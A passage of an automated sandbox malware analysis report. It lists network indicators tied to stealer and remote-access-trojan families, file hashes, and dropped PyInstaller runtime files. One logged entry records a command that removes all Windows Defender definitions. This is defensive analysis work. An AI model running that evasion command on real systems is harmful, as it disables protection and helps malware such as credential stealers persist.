                                                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          01:19:11API Interceptor8x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                          01:19:14API Interceptor145x Sleep call for process: powershell.exe modified

                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          208.95.112.19g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          ddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                          • ip-api.com/json/
                                                                                                                                                                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          Java32.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          162.159.137.2329g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                              arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                  phost.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                    WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                      EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        program.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                          NEVER OPEN!.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                                                                                                                                                            YDW0S5K7hi.exeGet hashmaliciousSilverRatBrowse

                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              discord.com9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                                              riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                                              AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                                                                              rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                                              Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                                              Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                                                                              dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                                              DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                                              http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                                                              YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.159.136.232
                                                                                                                                                                                                                                              ip-api.com9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              ddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              Java32.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1

                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              CLOUDFLARENETUShttps://bit.ly/3VYGxmhGet hashmaliciousCAPTCHA Scam ClickFix, PhisherBrowse
                                                                                                                                                                                                                                              • 104.18.95.41
                                                                                                                                                                                                                                              armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 198.41.197.77
                                                                                                                                                                                                                                              Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                              Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 104.26.13.205
                                                                                                                                                                                                                                              file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                                                                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.56.70
                                                                                                                                                                                                                                              SOElePqvtf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                                                                              m4lz5aeAiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                                                                              ehD7zv3l4U.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 104.21.112.1
                                                                                                                                                                                                                                              TUT-ASUS9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              ddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              kthiokadjg.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              file.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              23khy505ab.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              Java32.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1

                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dllriFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                  AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                    DChOtFdp9T.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                                                                      user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                                                          YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                            wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                                              wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                                                wp-cent.exeGet hashmaliciousPython BackDoorBrowse

                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:@...e...........................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\? ?\Display (1).png

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):704614
                                                                                                                                                                                                                                                                  Entropy (8bit):7.928954301831258
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:0c7tSGZGc9BAsHal6UbsLWARajo9MqDD97yLa6:RMGREstLvajoqqDD97yLl
                                                                                                                                                                                                                                                                  MD5:6BBA932E5A8FA36282638D177E2FAB9C
                                                                                                                                                                                                                                                                  SHA1:8EC3C63BD08763F7CE4C8FAA18B8EEF10E049EEA
                                                                                                                                                                                                                                                                  SHA-256:9724B01C774130C74D9BBA865A280DC11C7A8D92E5244A3516C49B089ABB68E6
                                                                                                                                                                                                                                                                  SHA-512:8855D8EA9A14E2DCF10064F798902F446195CFA1C1F0B904B9C5888D2BEA0FB446810404E299D778E3457EDB20CEB8733120CF10E730B3CFCA17E3CC08F4FF02
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....fWy..........g.n...[u......3U3m.g@.r.9@#.....%$.b...P. ...cYBB......s.$...[.........sN.i.._.......w.......tN.y5.<.....NM.h..^..0..)k....3.3m._...I...'>..s.DA7}..dM..L.0I..g.....Wl6...........86...'...<.V.z|$&..O..{T.w..GN.....e...a..}..6./<:...N....i..!.C.....{h.r...J.....DA.3....kY.....O.7..'....'DZ?.....`...i........Ew...?....L...2......q............}..[..o0..>Wj'....,./f.=?.,xw........(S.h.X9..w.}.......}.w..`....Nw.U..T..q{.p.mSX..[3.o.%......./,X...c...}s.y[b..\?.....L...{.,.;.....j`.y..qcF.=ojcK.v[.x...7T...>C_,N.....uc.-...j..)g..?...uw.........uUg.ks...=.gK1.....v..Z.r..v...G......pu.c. .....zl"]...8,..j..i....vLs;\..n.u.[..M.]....wJ.wL.nwu.......>}....Ll.e.....x.t..v..A.[..5..;..&|--1..8}.E._.[..[.].....Wd..s=l.......[].Y......g..l}e..#6.U.w.t.-~PMl~y./.:}....f...>G..m...>h/....*..2.m..V...M/..l.....'.3..-.:....|.../...\..:._.c....

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):894
                                                                                                                                                                                                                                                                  Entropy (8bit):3.1099977634615996
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:Q58KRBubdpkoPAGdjrZ+rAk9+MlWlLehW51IC4+rp:QOaqdmOFdjrQrj+kWResLI4rp
                                                                                                                                                                                                                                                                  MD5:65519ADC656DEF71C20A51D6CFEE2713
                                                                                                                                                                                                                                                                  SHA1:B1E796133941557AD29B9D7F450ADA24634ACC6A
                                                                                                                                                                                                                                                                  SHA-256:0D122BF9E377907D9F9A3040508B08DEFE56362ECC6156AEAF98D9038F6E84AA
                                                                                                                                                                                                                                                                  SHA-512:E4B9AD5C8C6E00F7BDFA478D9C2D7B39A4F783A9F82FE75C4ACD2EE7E25A2A0E1A42E40D0949945FBA0BE487AA8491F234D3E797C21535D46D459AAA2736743F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. J.a.n. .. 0.5. .. 2.0.2.5. .0.2.:.3.6.:.1.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. J.a.n. .. 0.5. .. 2.0.2.5. .0.2.:.3.6.:.1.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RES5209.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4be, 9 symbols, created Sun Jan 5 07:36:01 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):1380
                                                                                                                                                                                                                                                                  Entropy (8bit):4.146035591526891
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:HrgDW9/5XAZHtwKW4tXNeI+ycuZhNVakSjPNnqSGd:LlJAZuKNBw1ulVa3JqS2
                                                                                                                                                                                                                                                                  MD5:BB940C5AFA6B2BCCE382B6BE8E0DAB94
                                                                                                                                                                                                                                                                  SHA1:ABE12DF994EADCFB62734E214B6A42FBBBE051BB
                                                                                                                                                                                                                                                                  SHA-256:F720D71990193D65F77095A282AB344EA8365E9A474333CF525AF135E2544EF0
                                                                                                                                                                                                                                                                  SHA-512:A16A9E11FCA4D75B9ED5CC049E52B13ED5962CE76565696D7EC22BE47B6A95C1AD7C7A4875715D3F1BEB5A2909F9A37982A13362833FF7259CC2D625B6B5FB72
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:L...a6zg.............debug$S............................@..B.rsrc$01........X.......d...........@..@.rsrc$02........P...n...............@..@........W....c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP................&:.x.P....[..w...........7.......C:\Users\user~1\AppData\Local\Temp\RES5209.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.e.x.z.y.3.0.0...d.l.l.....(.....

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):120400
                                                                                                                                                                                                                                                                  Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                                                  MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                                                  SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                                                  SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                                                  SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                  • Filename: riFSkYVMKB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: mcgen.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: AimStar.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: DChOtFdp9T.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: user.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: HX Design.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: YgJ5inWPQO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: wp-s2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: wp-s2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: wp-cent.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI33962\_bz2.pyd

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):49944
                                                                                                                                                                                                                                                                  Entropy (8bit):7.790464947091356
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:JpidZ+u7Tclz8mYAR9jL7GWLRsYIe+9ZypJEIvCVH0S5YiSyv4AMxkEd:idYuTeh9jLN+BXIEIvCVHV7Sy+xJ
                                                                                                                                                                                                                                                                  MD5:1D9398C54C80C0EF2F00A67FC7C9A401
                                                                                                                                                                                                                                                                  SHA1:858880173905E571C81A4A62A398923483F98E70
                                                                                                                                                                                                                                                                  SHA-256:89006952BEE2B38D1B5C54CC055D8868D06C43E94CD9D9E0D00A716C5F3856FA
                                                                                                                                                                                                                                                                  SHA-512:806300D5820206E8F80639CCB1FBA685AAFA66A9528416102AEB28421E77784939285A88A67FAD01B818F817A91382145322F993D855211F10E7BA3F5563A596
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!...!...!...(.o.+...1I..#...1I.."...1I..%...1I..)...1I..,...iH.."...j...#...!...~...iH..)...iH.. ...iH.. ...iH.. ...Rich!...........PE..d....g.f.........." ...).............e....................................................`.............................................H.................... ..,...................................................q..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI33962\_ctypes.pyd

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60696
                                                                                                                                                                                                                                                                  Entropy (8bit):7.8398712444446845
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:FV+aMfd4DTR6Ukvr/MUCXKxGIe/qxUuj9IvLP3C7SyIxmL:uaMfd4D963/rC6/UuRIvLP3CjL
                                                                                                                                                                                                                                                                  MD5:2401460A376C597EDCE907F31EC67FBC
                                                                                                                                                                                                                                                                  SHA1:7F723E755CB9BFEAC79E3B49215DD41FDB5C2D90
                                                                                                                                                                                                                                                                  SHA-256:4F3F99B69834C43DAC5C3F309CB0BD56C07E8C2AC555DE4923FA2DDC27801960
                                                                                                                                                                                                                                                                  SHA-512:9E77D666C6B74CFB6287775333456CCE43FEB51EC39AD869C3350B1308E01AD9B9C476C8FA6251FE8AD4AB1175994902A4AD670493B95EB52ADB3D4606C0B633
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f~.............................................................................){.............................................Rich............PE..d....g.f.........." ...)............`........................................P............`.........................................HL.......I.......@.......................L......................................p:..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI33962\_decimal.pyd

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):110360
                                                                                                                                                                                                                                                                  Entropy (8bit):7.936298430802442
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:7RimMfx90veyiqn/2lwhqLGaRIvOqZ7Iqc:aD5qnY6B7/c
                                                                                                                                                                                                                                                                  MD5:DF361EA0C714B1A9D8CF9FCF6A907065
                                                                                                                                                                                                                                                                  SHA1:102115EC2E550A8A8CAD5949530CCA9993250C76
                                                                                                                                                                                                                                                                  SHA-256:F78EE4524EB6E9885B9CBDB125B2F335864F51E9C36DC18FDCCB5050926ADFFE
                                                                                                                                                                                                                                                                  SHA-512:B1259DF9167F89F8DF82BDA1A21A26EE7EB4824B97791E7BBAA3E57B50AE60676762FD598C8576D4E6330FFAF12972A31DB2F17B244C5301DCF29FE4ABFBA43F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J6U.+X..+X..+X..S...+X..Y..+X..[..+X..\..+X..]..+X...Y..+X..SY..+X..+Y.E+X...[..+X...U..+X...X..+X......+X...Z..+X.Rich.+X.................PE..d....g.f.........." ...).p...................................................@............`..........................................<..P....9.......0..........d&...........=.......................................+..@...........................................UPX0....................................UPX1.....p.......n..................@....rsrc........0.......r..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI33962\_hashlib.pyd

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):36632
                                                                                                                                                                                                                                                                  Entropy (8bit):7.678631968364815
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:PbKdUeBIro4sU/QKPpFTvIvOIiX5YiSyv/AMxkEU:PG9Ws9K7TvIvOIiJ7Sy3xg
                                                                                                                                                                                                                                                                  MD5:D4C05F1C17AC3EB482B3D86399C9BAAE
                                                                                                                                                                                                                                                                  SHA1:81B9A3DD8A5078C7696C90FBD4CF7E3762F479A5
                                                                                                                                                                                                                                                                  SHA-256:86BD72B13A47693E605A0DE1112C9998D12E737644E7A101AC396D402E25CF2F
